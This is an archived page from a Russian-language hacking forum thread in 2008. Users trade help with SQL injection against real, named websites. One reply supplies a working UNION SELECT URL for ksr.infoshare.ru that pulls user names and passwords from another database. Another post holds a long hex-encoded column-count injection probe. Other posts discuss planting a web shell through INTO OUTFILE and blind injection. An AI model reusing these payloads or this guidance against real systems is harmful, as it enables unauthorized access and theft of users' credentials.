ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
04.09.2008, 18:30
|
|
Познающий
Регистрация: 30.10.2007
Сообщений: 63
Провел на форуме:
299216
Репутация:
59
|
|
Сообщение от .Striker
чрез удаленную базу возможно шелл залить на сайт? или можно только через локальную?
Удалённая (в случае наличия прав на into outfile) будет создавать файлы на сервере БД.
|
|
|
04.09.2008, 20:02
|
|
Познающий
Регистрация: 19.08.2008
Сообщений: 61
Провел на форуме:
645169
Репутация:
68
|
|
Что из себя представляет Trace метод... ???
Выдало в сканере, найти вразумительног она эту тему ничего не могу
искал на сайте аси
"HTTP/1.1 200 OK
Date: Thu, 04 Sep 2008 15:05:28 GMT
Server: Apache
Transfer-Encoding: chunked
Content-Type: message/http
TRACE /TRACE_test HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727) JSky/0.1
Host: www.icq.com
Accept: */*
"
в чем суть Trace ?
|
|
|
|
04.09.2008, 20:14
|
|
Постоянный
Регистрация: 24.05.2008
Сообщений: 589
Провел на форуме:
3629857
Репутация:
504
|
|
http://ru.wikipedia.org/wiki/Http
TRACE
Возвращает полученный запрос так, что клиент может увидеть, что промежуточные сервера добавляют или изменяют в запросе.
Последний раз редактировалось gisTy; 04.09.2008 в 20:18..
|
|
|
|
04.09.2008, 21:52
|
|
Новичок
Регистрация: 04.09.2007
Сообщений: 13
Провел на форуме:
29295
Репутация:
4
|
|
Привет всем, в чём подвох?
запрос:
http://www.ksr.infoshare.ru/lib/?div=-1+union+select+table_name+from+information_schema. tables+limit+24,50--
выдаёт "users"
А запрос:
http://www.ksr.infoshare.ru/lib/?div=-1+union+select+concat_ws(name,nik,pass)+from+users+limit+0,50--
Выдаёт "Table 'h_ksr.users' doesn't exist"
Как такое может быть и как с этим бороться?
Заранее спасибо
Последний раз редактировалось zjuk@; 04.09.2008 в 21:55..
|
|
|
|
04.09.2008, 21:57
|
|
Leaders of Antichat - Level 4
Регистрация: 26.11.2006
Сообщений: 237
Провел на форуме:
13395217
Репутация:
2097
|
|
Там users лежит просто в другой БД, данные получать надо так:
http://www.ksr.infoshare.ru/lib/?div=-1+union+select+concat_ws(0x3a,name,nik,pass)+from+ aidsprintinfosha.users+limit+0,50--
__________________
Не занимаюсь коммерцией в любых ее проявлениях.
Последний раз редактировалось l-l00K; 04.09.2008 в 22:01..
|
|
|
|
04.09.2008, 22:29
|
|
Новичок
Регистрация: 04.09.2007
Сообщений: 13
Провел на форуме:
29295
Репутация:
4
|
|
Сообщение от l-l00K
Там users лежит просто в другой БД, данные получать надо так:
http://www.ksr.infoshare.ru/lib/?div=-1+union+select+concat_ws(0x3a,name,nik,pass)+from+ aidsprintinfosha.users+limit+0,50--
Благодарю
|
|
|
|
04.09.2008, 22:35
|
|
Участник форума
Регистрация: 29.11.2005
Сообщений: 122
Провел на форуме:
1050637
Репутация:
27
|
|
Нашел скулю, выводило :Query failed: The used SELECT statements have a different number of columns
Код:
1 UNION SELECT 0x73716C696E6A666C6431,0x73716C696E6A666C6432,0x73716C696E6A666C6433,0x73716C696E6A666C6434,0x73716C696E6A666C6435,0x73716C696E6A666C6436,0x73716C696E6A666C6437,0x73716C696E6A666C6438,0x73716C696E6A666C6439,0x73716C696E6A666C643130,0x73716C696E6A666C643131,0x73716C696E6A666C643132,0x73716C696E6A666C643133,0x73716C696E6A666C643134,0x73716C696E6A666C643135,0x73716C696E6A666C643136,0x73716C696E6A666C643137,0x73716C696E6A666C643138,0x73716C696E6A666C643139,0x73716C696E6A666C643230,0x73716C696E6A666C643231,0x73716C696E6A666C643232,0x73716C696E6A666C643233,0x73716C696E6A666C643234,0x73716C696E6A666C643235,0x73716C696E6A666C643236,0x73716C696E6A666C643237,0x73716C696E6A666C643238,0x73716C696E6A666C643239,0x73716C696E6A666C643330,0x73716C696E6A666C643331,0x73716C696E6A666C643332,0x73716C696E6A666C643333,0x73716C696E6A666C643334,0x73716C696E6A666C643335,0x73716C696E6A666C643336,0x73716C696E6A666C643337,0x73716C696E6A666C643338,0x73716C696E6A666C643339,0x73716C696E6A666C643430,0x73716C696E6A666C643431,0x73716C696E6A666C643432,0x73716C696E6A666C643433,0x73716C696E6A666C643434,0x73716C696E6A666C643435,0x73716C696E6A666C643436,0x73716C696E6A666C643437,0x73716C696E6A666C643438,0x73716C696E6A666C643439,0x73716C696E6A666C643530,0x73716C696E6A666C643531,0x73716C696E6A666C643532,0x73716C696E6A666C643533,0x73716C696E6A666C643534,0x73716C696E6A666C643535,0x73716C696E6A666C643536,0x73716C696E6A666C643537,0x73716C696E6A666C643538,0x73716C696E6A666C643539,0x73716C696E6A666C643630,0x73716C696E6A666C643631,0x73716C696E6A666C643632,0x73716C696E6A666C643633,0x73716C696E6A666C643634,0x73716C696E6A666C643635,0x73716C696E6A666C643636,0x73716C696E6A666C643637,0x73716C696E6A666C643638,0x73716C696E6A666C643639,0x73716C696E6A666C643730,0x73716C696E6A666C643731,0x73716C696E6A666C643732,0x73716C696E6A666C643733,0x73716C696E6A666C643734,0x73716C696E6A666C643735,0x73716C696E6A666C643736,0x73716C696E6A666C643737,0x73716C696E6A666C643738,0x73716C696E6A666C643739,0x73716C696E6A666C643830,0x73716C696E6A666C643831,0x73716C696E6A666C643832,0x73716C696E6A666C643833/*
перебрал до 54 вывело : not found in database
и что делать? даже Version() не знаю, поля для вывода какбы нету, но если пишу from mysql.user то матюкаеться что нету прав.
что делать? |
|
|
|
04.09.2008, 22:41
|
|
Постоянный
Регистрация: 05.12.2006
Сообщений: 477
Провел на форуме:
11338585
Репутация:
441
|
|
ссылку бы
|
|
|
|
04.09.2008, 22:42
|
|
Постоянный
Регистрация: 28.09.2007
Сообщений: 820
Провел на форуме:
6722038
Репутация:
1385
|
|
сдепая скуля .. ассии тебе в руки ..
|
|
|
|
05.09.2008, 00:35
|
|
Участник форума
Регистрация: 16.11.2006
Сообщений: 230
Провел на форуме:
599789
Репутация:
227
|
|
2Grema
попробуй с order by, group by
и проверь на раскрытые скобки
|
|
|
|
|
|
|
|
Здесь присутствуют: 4 (пользователей: 0 , гостей: 4)
|
|
|
|
Похожие темы
Линейный вид
